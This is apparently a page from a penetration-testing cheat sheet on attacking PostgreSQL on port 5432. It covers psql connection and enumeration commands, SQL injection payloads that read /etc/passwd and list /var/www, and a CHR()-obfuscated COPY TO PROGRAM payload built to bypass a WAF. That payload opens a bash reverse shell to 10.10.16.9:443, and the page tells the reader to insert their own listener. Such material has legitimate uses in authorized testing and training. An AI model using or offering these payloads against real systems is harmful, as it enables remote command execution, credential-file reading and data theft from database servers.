PostgreSQL Port (5432)

PostgreSQL is a powerful, open-source object-relational database system. During security assessments, you may encounter PostgreSQL services running on standard ports 5432 or alternative ports like 5433.

How to Connect

Basic Local Connection

psql -U <myuser>

Opens the psql console with the specified user.

Remote Connection (Basic)

psql -h <host> -U <username> -d <database>

Connect to a remote PostgreSQL server specifying host, username, and database.

Remote Connection (Full Parameters)

psql -h <host> -p <port> -U <username> -W <password> <database>

Complete remote connection with all parameters including custom port and password prompt.

Enumeration

List All Databases

\l

This command displays all available databases on the PostgreSQL server.

Switch to a Database

\c <database_name>

Change the current working database context.

List Tables in Current Database

\dt

Shows all tables within the currently selected database.

Extract Data from Specific Table

SELECT * FROM <table_name>;

Retrieve all records from a specified table.

File System Operations

Read File

''; SELECT pg_read_file('/etc/passwd',0,1000);

Reads the contents of a file from the server's filesystem. This example reads the first 1000 characters of /etc/passwd.

List Directory

''; SELECT pg_ls_dir('/var/www/');

Lists the contents of a directory on the server's filesystem.

Advanced Exploitation

Reverse Shell WAF Bypass through SQL Injection

'';DO $reverse$
DECLARE
    s text;
BEGIN
    s := CHR(67)||CHR(79)||CHR(80)||CHR(89)||
         ' (SELECT '''') TO PROGRAM ' ||
         quote_literal('bash -c "bash -i >& /dev/tcp/10.10.16.9/443 0>&1"');
    EXECUTE s;
END $reverse$;

This technique uses PostgreSQL's COPY command with a program execution to establish a reverse shell connection. The payload:

  • Uses CHR() functions to obfuscate the "COPY" command

  • Executes a bash reverse shell connecting to IP 10.10.16.9 on port 443

  • Bypasses basic WAF filters through string concatenation

Note: Remember to replace the IP address and port with your actual listener configuration.

Security Considerations

PreviousPOP3 Port (110)NextRDP Port (3389)

Last updated